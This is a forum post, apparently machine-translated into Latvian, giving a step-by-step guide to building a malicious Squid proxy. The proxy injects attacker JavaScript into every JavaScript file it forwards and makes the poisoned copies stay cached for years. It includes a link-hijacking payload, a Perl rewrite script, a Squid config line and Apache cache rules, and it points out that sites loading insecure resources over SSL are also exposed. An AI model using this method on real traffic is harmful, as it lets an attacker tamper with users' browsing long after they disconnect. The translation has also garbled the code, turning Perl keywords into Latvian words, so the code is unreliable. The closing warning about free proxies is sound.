Šo ziņu pēdējo reizi rediģēja Mo Xiaowen 2015-6-7 23:19
To var izdarīt, vienkārši mainot SQUID konfigurāciju
Kas ir SQUID?
Kalmārs ir programmatūra, kas kešatmiņā glabā interneta datus, saņem lejupielādes pieprasījumus no lietotājiem un automātiski apstrādā lejupielādētos datus. Kad lietotājs vēlas lejupielādēt mājaslapu, viņš var nosūtīt pieprasījumu Squid, lūgt Squid to lejupielādēt viņa vārdā, pēc tam Squid izveido savienojumu ar vietni un pieprasa mājaslapu, un pēc tam nosūta mājaslapu lietotājam, saglabājot dublējumu, kad citi lietotāji piesakās tai pašai lapai, Squid nekavējoties nosūta lietotājam saglabāto dublējumu, lai lietotājs justos, ka ātrums ir diezgan ātrs. Squid var starpniekservera protokolus, piemēram, HTTP, FTP, GOPHER, SSL un WAIS, un Squid var to apstrādāt automātiski, un jūs varat iestatīt Squid atbilstoši savām vajadzībām, lai filtrētu nevēlamas lietas.
Squid var darboties daudzās operētājsistēmās, piemēram, AIX, Digital, UNIX, FreeBSD, HP-UX, Irix, Linux, NetBSD, Nextstep, SCO, Solaris, OS/2 utt.
Īstenošana ir ļoti vienkārša:
1. Instalējiet Squid vienā Linux serverī.
2. Modificējiet servera kodu, ievietojiet mūsu koda gabalu visos pārsūtītajos javascrip un nosūtiet to.
3. Iestatiet mūsu modificētā js faila kešatmiņas laiku pēc iespējas augstāku.
Šī metode attiecas arī uz vietnēm ar iespējotu SSL, ja vietne ielādē nedrošu resursu (piemēram, jquery HTTP vietnei), lielākā daļa pārlūkprogrammu sniegs brīdinājumu, bet tikai daži cilvēki pievērš uzmanību.
Chema teica, ka vairāk nekā 5,000 cilvēku izmantoja viņa starpniekserveri dažas dienas pēc tā izlaišanas, un lielākā daļa cilvēku to izmantoja, lai darītu sliktas lietas, jo viņi izmantoja starpniekserveri, tāpēc viņi domāja, ka tas ir anonīms un drošs, bet viņi nekad negaidīja, ka starpniekserveris darīs arī sliktas lietas.
Izveidojiet savu ļaunprātīgo starpniekserveri
Ja jums jau ir Squid starpniekserveris, jums būs nepieciešams arī tīmekļa serveris, piemēram, Apache.
1. solis: izveidojiet lietderīgo kravu
Es izmantoju vienkāršu skriptu kā demonstrāciju, lai norādītu visas hipersaites uz manu vietni.
/etc/squid/payload.js
[mw_shl_code=javascrip noņemt t, true]for(var i=0; i<document.getelementsbytagname('a').length; i++)
document.getElementsByTagName('a').href = "https://blog.haschek.at"; [/mw_shl_code]
2. solis: uzrakstiet skriptu, lai inficētu visus JS failus
/etc/squid/poison.pl
[mw_shl_code=perl,true]
#!/usr/bin/perl
$|=1;
$count = 0;
$pid = $$;
while(<>)
{
čakars $_;
if($_ =- /(.*.js)/i)
{
$url = 1 USD;
system("/usr/bin/wget","-q","-O","/var/www/tmp/$pid-$count.js","$url");
sistēma ("chmod o+r /var/www/tmp/$pid-$count.js");
sistēma ("cat /etc/squid/payload.js >> /var/www/tmp/$pid-$count.js");
drukāt "http://127.0.0.1:80/tmp/$pid-$count.js";
}
citādi
{
drukāt "$_";
}
$count++;
}[/mw_shl_code]
Šis skripts izmanto wget, lai iegūtu lapas oriģinālo javascrip un noņemtu t failu, pēc tam pievienojiet kodu /etc/squid/payload.js un nosūtiet modificēto failu klientam, kamēr jums ir jāizveido direktorija /var/www/tmp un jāļauj kalmāriem tajā rakstīt failus. Šajā direktorijā tiek glabāti modificētie js faili.
3. solis: apvienojiet iepriekš minēto skriptu ar kalmāru
Pievienojiet to /etc/squid/squid.conf
[mw_shl_code=html,true]url_rewrite_program /etc/squid/poison.pl[/mw_shl_code]
4. solis Padariet kešatmiņu nekad neizdodas
/var/www/tmp/.htaccess
[mw_shl_code=html,true] BeidzasAktīvs
BeidzasNoklusējums "piekļuve plus 3000 dienas"[/mw_shl_code]
Tas liks Apache dot viņam ilgu derīguma termiņu, līdz lietotājs iztīrīs kešatmiņu.
Ja pievienojat šo starpniekserveri, noklikšķinot uz jebkuras hipersaites, jūs novirzīsiet uz manu vietni, un kešatmiņa joprojām pastāvēs pat tad, ja vēlāk neizmantosiet starpniekserveri. Es tikko izmantoju neagresīvu kravu, un ar šo metodi hakeri var izdarīt daudz vairāk. Tāpēc atgādiniet sev un draugiem būt piesardzīgiem, izmantojot bezmaksas starpniekserverus.
|
Publicēts 19.01.2015 02:34:56
|
|
|
|
Publicēts 19.01.2015 08:48:45
|
Saimnieks|
Publicēts 20.01.2015 14:36:06
|
